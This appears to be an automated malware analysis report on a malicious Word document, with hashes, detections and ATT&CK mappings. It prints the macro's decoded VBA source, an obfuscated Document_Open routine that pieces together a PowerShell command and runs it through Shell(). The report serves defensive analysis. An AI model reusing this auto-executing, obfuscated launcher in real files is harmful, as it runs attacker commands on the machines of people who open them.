Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 77ae62fe8eea41cf…

MALICIOUS

Office (OLE)

Size: 267.5 KB
Created: 2019-02-05 12:39:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: c07bbadeb3e0e21710918b6aa4dc0659
SHA-1: f225c68b6047c23ec50fc522ef8c4045edf69c9b
SHA-256: 77ae62fe8eea41cfd33a6b211ff1eada6c23ff37313a6712c6ea9917487780e9
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro, a common technique for gaining initial execution when the document is opened. The critical heuristic firing for a Shell() call in VBA indicates that the macro attempts to execute commands. The script assembles its command from string fragments (in the extracted source these spell "powerSHELL " followed by text read from a form control) so that the full command never appears as one literal; this is most likely intended to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Malware.Sagent-6846843-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6846843-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2147 bytes
SHA-256: 8afbd2e148897d3e2a290a161e2586356b675f88f142d5878bc80f93646ddbbd

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

Dim lEtUSFy(7 To 153) As String
lEtUSFy(7) = "a6H2s"
Dim iYr4X1Jxt(7 To 153) As String
iYr4X1Jxt(7) = "m8N0hM"

Dim U5GbeKjrI(14 To 88) As Long
U5GbeKjrI(14) = -114 + 238
Dim jTRhfB9iE(1 To 59) As String
jTRhfB9iE(1) = "ppKwq"
Call w("er")
End Sub

Attribute VB_Name = "QfAlPia"
Sub w(FWtswA)
Dim MsmW8h(5 To 232) As String
MsmW8h(5) = "WL8SE"
Dim nsQV6p
nsQV6p = DcoaZzG
Dim JJvbWd As Long
JJvbWd = (1081 - 1063) / (9)
Dim ry86O5Mt(16 To 47) As String
ry86O5Mt(16) = "qj0VQ3YA"
zWa41Lq2Q = "SHE" & "LL "
NAnoNR = "ow"
XmL4o8 = FWtswA
Dim C7MSyfbz(11 To 39) As Long
C7MSyfbz(11) = 21384 / 198
HzoXW DsEqD() & NAnoNR & XmL4o8 & zWa41Lq2Q & K1nCIfmh
End Sub

Attribute VB_Name = "TL3ADZOM"
Public Function DsEqD() As String
Dim U5wGQl As Long
U5wGQl = (21822 / 7274) / (37)
Dim bBxQGcbr As String
bBxQGcbr = Awtzg1ucq
Dim RBLMn(4 To 99) As Long
RBLMn(4) = 267 - 36
Dim sOFwMYkBn(11 To 101) As Long
sOFwMYkBn(11) = 15265 / 71
Dim m3CfSx
m3CfSx = TvNWcQ8
Dim UOLGe As String
UOLGe = t1UXxB
DsEqD = "p"
End Function
Function HzoXW(q372K)
HzoXW = Shell(q372K, False)
End Function

Attribute VB_Name = "MzPONdl"
Public Function K1nCIfmh()
Dim Mb23Vm5 As Object
Set Mb23Vm5 = New f
Dim dh5i6 As String
Dim MtamZgO1 As Long
MtamZgO1 = (1396 - 1389) * (10)
dh5i6 = Mb23Vm5.de.Text
Dim omYTKHX As String
omYTKHX = MXhCE
Dim sUqJFPY As Long
sUqJFPY = (1065 - 1052) * (13)
Dim wQcsJd As Long
wQcsJd = (6972 / 249) / (26)
K1nCIfmh = dh5i6
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{7EB83F0D-8243-47CE-B7BA-B48F9901F585}{8910233A-51CC-4E9E-AD7B-CD9B7A416385}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False